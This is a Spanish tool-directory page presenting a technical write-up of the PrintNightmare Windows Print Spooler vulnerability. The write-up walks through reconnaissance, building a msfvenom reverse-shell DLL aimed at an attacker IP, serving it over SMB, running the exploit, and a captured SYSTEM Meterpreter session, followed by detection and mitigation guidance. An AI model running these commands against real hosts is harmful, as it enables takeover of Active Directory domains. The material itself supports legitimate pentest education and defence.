Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-1675-PrintNightmare-Analysis — Informe técnico y análisis de PrintNightmare (CVE-2021-1675 / CVE-2021-34527), que cubre la explotación de RCE/LPE, la detección mediante registros de eventos de Windows y la mitigación para Print Spooler. | Kitploit
Herramientas/GitHubGitHub/velessecurity/cve-2021-1675-printnightmare-analysis
Escalada de PrivilegiosReconocimientoAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónPapers e InvestigaciónAprendizaje y EducaciónRespuesta a IncidentesAnálisis de Registros

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHubvelessecurity/cve-2021-1675-printnightmare-analysis

CVE-2021-1675-PrintNightmare-Analysis

Informe técnico y análisis de PrintNightmare (CVE-2021-1675 / CVE-2021-34527), que cubre la explotación de RCE/LPE, la detección mediante registros de eventos de Windows y la mitigación para Print Spooler.

Ver Repositorio
5hace 22 díasAún no revisado

Investigación de vulnerabilidades: Elevación local de privilegios y RCE a través de Windows Print Spooler (PrintNightmare / CVE-2021-1675)

El repositorio contiene un informe técnico detallado (write-up) y el análisis del concepto de explotación de una vulnerabilidad crítica en el servicio del administrador de impresión de Windows (Print Spooler), que permite a un usuario de dominio con bajos privilegios ejecutar código arbitrario de forma remota con los máximos privilegios del sistema.

🛑 ADVERTENCIA Y DESCARGO DE RESPONSABILIDAD: Este material ha sido preparado exclusivamente con fines educativos y para la realización de auditorías de seguridad legítimas (Pentest). El uso de las técnicas descritas contra sistemas sin el consentimiento previo por escrito de los propietarios está penado por la ley.


📌 Relevancia y contexto de la investigación

Las vulnerabilidades de la familia PrintNightmare representan una amenaza crítica para los entornos corporativos basados en Windows Server y Active Directory. El defecto arquitectónico en la verificación de privilegios en las interfaces RPC MS-RPRN (Print System Remote Protocol) y MS-PAR (Print System Asynchronous Remote Protocol) permite solicitar legítimamente la instalación de controladores de impresora en un servidor remoto.

El principal peligro radica en que, por defecto, el servicio del administrador de impresión (spoolsv.exe) está activo en la mayoría de los servidores, incluidos los controladores de dominio (Domain Controllers), y se ejecuta en el contexto de los máximos privilegios, NT AUTHORITY\SYSTEM. La compromisión de una sola cuenta de bajos privilegios (por ejemplo, mediante phishing) permite al atacante tomar inmediatamente el control total de toda la infraestructura de Active Directory.


🏗 Arquitectura de la investigación y stack

  • Objetivo: Obtener el control sobre un host Windows remoto a través de las interfaces RPC de impresión.
  • Vector de ataque: RPC Remote Driver Load → DLL Injection → SYSTEM Privileges.
  • Herramientas: impacket (rpcdump, smbserver), msfvenom, Metasploit Framework, exploit en Python.

📈 Procedimiento práctico de explotación

Paso 1. Reconocimiento y recopilación de credenciales (Reconnaissance)

Para implementar el vector de ejecución remota de código (RCE) se necesitan credenciales de dominio válidas de un usuario con privilegios mínimos (proporcionadas en las condiciones de la investigación).

  • Auditoría básica del servicio: El servicio Print Spooler (spoolsv.exe) en la máquina Windows objetivo está activo y se ejecuta con privilegios máximos SYSTEM, lo que abre una vía directa para la elevación local de privilegios (LPE) en el host mediante la carga de una biblioteca no confiable.

Paso 2. Escaneo de interfaces RPC (Scanning)

Antes de ejecutar el exploit principal, es necesario verificar que la máquina remota expone los protocolos de impresión vulnerables y está abierta a la interacción de red. Realizamos una consulta de las interfaces RPC del sistema objetivo:

root@kitploit:~
impacket-rpcdump @<TARGET_IP> | egrep 'MS-RPRN|MS-PAR'

Salida controlada de la terminal:

root@kitploit:~
Protocol: [MS-RPRN], Endpoint: [\pipe\spoolss]
Protocol: [MS-PAR], Endpoint: [\pipe\spoolss]
  • Conclusión de la etapa: El host objetivo devolvió correctamente las cadenas de protocolo [MS-RPRN] y [MS-PAR]. Esto confirma al 100% que el sistema admite las interfaces de impresión remota necesarias y es vulnerable al vector PrintNightmare.

Paso 3. Preparación de la carga útil y la infraestructura (Weaponization)

1. Generación de la DLL maliciosa con reverse shell:

Creamos la carga útil para la arquitectura x64, indicando la IP de nuestra máquina atacante para la conexión de red inversa:

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -f dll -o /tmp/malicious.dll

2. Inicio del listener en segundo plano en Metasploit:

root@kitploit:~
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST <ATTACKER_IP>; set LPORT 4444; run -j"

3. Despliegue de un recurso compartido SMB local:

El servidor Windows objetivo debe tener una forma legítima de descargar nuestra DLL a través de la red sin utilizar utilidades de terceros. Levantamos un servidor SMB con soporte del protocolo SMBv2 desde la carpeta /tmp:

root@kitploit:~
sudo impacket-smbserver tmp /tmp -smb2support

Paso 4. Explotación y toma de control del sistema (Exploitation)

Ejecutamos el script de exploit en Python, pasándole las credenciales de dominio de un usuario con bajos privilegios y la ruta UNC a la biblioteca maliciosa en nuestro recurso compartido SMB local:

root@kitploit:~
python3 CVE-2021-1675.py <LOW_PRIV_USER>:<PASSWORD>@<TARGET_IP> '\\<ATTACKER_IP>\tmp\malicious.dll'

Registro de la sesión interceptada con éxito (Metasploit):

root@kitploit:~
[*] Started reverse TCP handler on <ATTACKER_IP>:4444 
[*] Sending stage (200574 bytes) to <TARGET_IP>
[*] Meterpreter session 1 opened (<ATTACKER_IP>:4444 -> <TARGET_IP>:49321)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > shell
Process 3412 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1935]
(c) Корпорация Майкрософт (Microsoft Corporation). Все права защищены.

C:\Windows\system32> whoami
nt authority\system
  • Resultado: Tras la ejecución del exploit, el servicio de impresión remota cargó con éxito el controlador malicioso desde la carpeta de red. En Metasploit se abrió una sesión Meterpreter con el estado de máximos privilegios NT AUTHORITY\SYSTEM. El objetivo está completamente comprometido.

🔍 Indicadores de compromiso y detección (Detection)

Para los especialistas de Blue Team, la detección de la explotación de PrintNightmare se basa en la auditoría de los registros del sistema de Windows y el seguimiento de la actividad anómala de los procesos.

1. Monitoreo de eventos de Windows (Event Logs)

La ejecución exitosa del exploit deja registros característicos en los registros de impresión y en los registros del sistema:

  • Event ID 808 (PrintService): Registro de un fallo o de una carga atípica del módulo de impresora. Permite ver el nombre de la DLL de terceros cargada (por ejemplo, desde rutas C:\Windows\System32\spool\drivers\x64\3\).
  • Event ID 7031 (System): Reinicio forzado repentino del servicio del Administrador de impresión (Print Spooler), causado por el funcionamiento inestable del exploit.

2. Comportamiento de los procesos (EDR / Sysmon)

  • Actividad hija anómala: Aparición de procesos de línea de comandos (cmd.exe, powershell.exe) o utilidades de recopilación de datos cuyo proceso padre es el proceso del sistema del administrador de impresión spoolsv.exe. En condiciones legítimas, spoolsv.exe nunca genera shells de comandos.
  • Actividad de red: Establecimiento de conexiones de red salientes por parte del proceso spoolsv.exe hacia recursos SMB externos (puerto 445) para descargar archivos de controladores.

🛡 Recomendaciones para la mitigación de la vulnerabilidad (Mitigation)

  1. Desactivación completa del servicio (Recomendado): Si el servidor no realiza funciones de impresión (especialmente en los Controladores de Dominio), el servicio Print Spooler debe desactivarse por completo y ponerse en modo Disabled.
  2. Restricción de la impresión remota: Desactivación de la capacidad de impresión remota a través de directivas de grupo (GPO):
    • Computer Configuration -> Administrative Templates -> Printers -> Allow Print Spooler to accept client connections (Disabled).
  3. Instalación de actualizaciones: Aplicar oportunamente las actualizaciones oficiales de seguridad de Microsoft (KB) para cerrar las vulnerabilidades de ejecución remota de código en el subsistema de impresión.

🔗 Enlaces y materiales útiles

  • Base de datos CVE: NIST NVD - CVE-2021-1675 | NIST NVD - CVE-2021-34527
  • Artículos de análisis: Microsoft Security Update Advisory
Descargar herramienta